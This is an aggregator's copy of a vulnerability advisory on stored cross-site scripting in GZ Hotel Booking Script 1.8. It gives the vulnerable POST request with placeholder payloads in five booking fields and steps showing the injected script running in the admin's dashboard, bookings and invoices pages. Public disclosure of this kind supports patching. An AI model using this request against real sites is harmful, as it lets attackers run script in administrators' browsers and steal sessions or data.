Security
Headlines
HeadlinesLatestCVEs

Headline

GZ Hotel Booking Script 1.8 Cross Site Scripting

GZ Hotel Booking Script version 1.8 suffers from a cross site scripting vulnerability.

Packet Storm
#sql#xss#vulnerability#web#php#auth
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-gz-hotel-booking-script.html                     ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Hotel Booking Script 1.8                                                ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /PHPGZHotelBooking/load.php?controller=GzFront&action=booking_details HTTP/1.1first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&terms=1&date_range=29.06.2023+-+30.06.2023&date_to=30.06.2023&date_from=29.06.2023&adults=1&children=1&order=&sort=&fromNumber=&toNumber=&room_id%5B4%5D=1&room_id%5B3%5D=0&room_id%5B2%5D=0&room_id%5B1%5D=0&adults_arr%5B4%5D%5B1%5D=1&children_arr%5B4%5D%5B1%5D=1-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Room] for Booking2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)      [-] Done

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution